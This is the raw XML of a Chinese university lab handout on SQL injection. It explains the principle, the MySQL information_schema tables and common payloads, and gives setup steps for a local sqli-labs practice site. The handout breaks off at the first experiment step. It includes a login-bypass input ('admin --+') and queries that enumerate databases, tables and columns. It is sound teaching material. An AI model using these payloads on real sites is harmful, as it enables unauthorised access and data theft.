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8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="240" w:after="60" w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="header-n189"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验五  SQL注入漏洞实验</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkStart w:id="1" w:name="header-n191"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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</w:pPr>
      <w:bookmarkStart w:id="2" w:name="header-n2"/>
      <w:r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  <w:t>5.1 实验目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing w:line="360" w:lineRule="auto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（1）熟悉sql语句的基本用法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing w:line="360" w:lineRule="auto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（2）了解sql安全问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing w:line="360" w:lineRule="auto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（3）掌握基本的攻击脚本编写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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</w:pPr>
      <w:r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  <w:t>5.2 实验要求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing w:line="360" w:lineRule="auto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（1）掌握sql注入原理和基本的利用方法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing w:line="360" w:lineRule="auto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（2）自主完成实操部分和自动化攻击利用exp编写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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</w:pPr>
      <w:bookmarkStart w:id="3" w:name="header-n201"/>
      <w:r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  <w:t>5.3 实验原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.3.1</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL介绍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing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结构化查询语言(Structured Query Language)简称SQL，是一种特殊目的的编程语言，是一种数据库查询和程序设计语言，用于存取数据以及查询、更新和管理关系数据库系统。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing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（介绍略）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.3.2</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL注入原理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把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令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看一个php举例：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正常的后端执行代码如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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486400" cy="1823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jc w:val="center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图5.3-1 php数据库连接后端代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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简单分析：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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根据用户在前端输入的'账号密码'，点击登录发送表单，传递到后端。接着后端取到传递的数据赋值在了sql语句之中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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如果正常的输入显然不会造成什么安全隐患，但是如果用户输入值中包含了sql语句的组成部分，就会导致sql语句逻辑被篡改，在特定情况下便可造成恶意的代码流程执行（攻击者期望的执行流程）。这种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>未处理用户输入而直接完整拼接进入sql语句之中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的问题被称为sql注入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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例如用户输入用户名$username为：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admin --+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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这样sql语句则变成了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Select * from user where username = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ad</w:t>
            </w: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min --+ and password=md5(‘$password’) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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因为 --+ 是注释符号，所以sql语句实际上成为，这样就可以无视后面的密码限制，直接登录成功。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Select * from user where username = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ad</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.3.3</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Information_schema介绍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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在MySQL中，把 information_schema 看作是一个数据库，确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>information_schema数据库表说明:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SCHEMATA表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TABLES表：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提供了关于数据库中的表的信息（包括视图）。详细表述了某个表属于哪个schema，表类型，表引擎，创建时间等信息。是show tables from schemaname的结果取之此表。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>COLUMNS表：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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除此之外还有其他许多表信息，此处不再赘述。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.3.4 sql注入常见的payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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猜数据库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select schema_name from information_schema.schemata </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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猜某库的数据表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select table_name from information_schema.tables where table_schema='xxxxx'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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猜某表的所有列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Select column_name from information_schema.columns where table_name='xxxxx' </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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获取某列的内容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Select *** from ****</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:kern w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.3.5</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>exp编写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在sql注入中会出现需要盲注的情况，就需要通过编程来自动化实现该过程。此处列出一些关于sql注入脚本的编写（python基本的request请求）。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基本的样式（GET请求）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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486400" cy="25476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jc w:val="center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图5.3-2 Get请求方式exp样式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基本样式（POST-time）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/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486400" cy="24803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jc w:val="center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图5.3-3 Post请求方式exp样式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基本样式（二分法加速注入遍历尝试过程）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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486400" cy="20624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jc w:val="center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图5.3-4 二分法加速注入exp样式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注：以上脚本无法直接拿来利用，请自行根据需求更改，根据自行的payload情况、注入方法等具体更改。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="240" w:beforeLines="100" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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</w:pPr>
      <w:r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  <w:t>5.4 实验相关资源</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="480" w:left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相关资料：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/Lee-404/p/12795193.html" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mysql注入原理介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/sdb5858874/article/details/80727555" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sqli-labs 部分题解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/wocalieshenmegui/p/5917967.html" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>十种报错注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/Triomphe/p/9489639.html" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>报错注入原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.jianshu.com/p/232071aa51ba" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sql注入脚本模板</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.cnblogs.com/forforever/p/13019703.html" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>盲注方法介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="5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本次实验的提供的附件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="80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lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>phpstudy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="80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lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sqli-labs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请自行安装配置。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可以通过官网下载phpstudy或者直接使用附件包中提供的环境。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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830955" cy="302260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9307" cy="306082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jc w:val="center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图5.4-1 启动phpstudy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按照上图启动Apache+mysql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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585335" cy="2997835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6412" cy="30509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jc w:val="center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图5.4-2 选择php版本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing w:before="120" w:beforeLines="5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注意：此处php版本选择5.6，如果选择的是php7+，后续安装会出现如下报错：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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334000" cy="64262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427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jc w:val="center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图5.4-3 报错提示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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856865" cy="2294255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3485" cy="23154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jc w:val="center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图5.4-4 修改mysql密码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如图5.4-4修改mysql默认密码，比如改成root。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然后到github上clone项目sqli-labs或者直接下载附件包中提供的sqli-labs。并将该项目文件放到phpstudy的WWW目录下。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注意修改mysql连接配置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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334000" cy="1401445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0171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jc w:val="center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图5.4-5 查看配置文件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完成后进入网站根目录（http://127.0.0.1/sqli-labs-master/sqli-labs-master/index.html）并选择Setup/reset Database for labs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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334000" cy="2381250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8140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jc w:val="center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图5.4-6 配置成功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出现如上图所示即实验环境配置完成。</w:t>
      </w:r>
    </w:p>
    <w:p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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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</w:pPr>
      <w:bookmarkStart w:id="4" w:name="header-n245"/>
      <w:r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  <w:t>5.5 实验步骤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="120" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.5.1</w:t>
      </w:r>
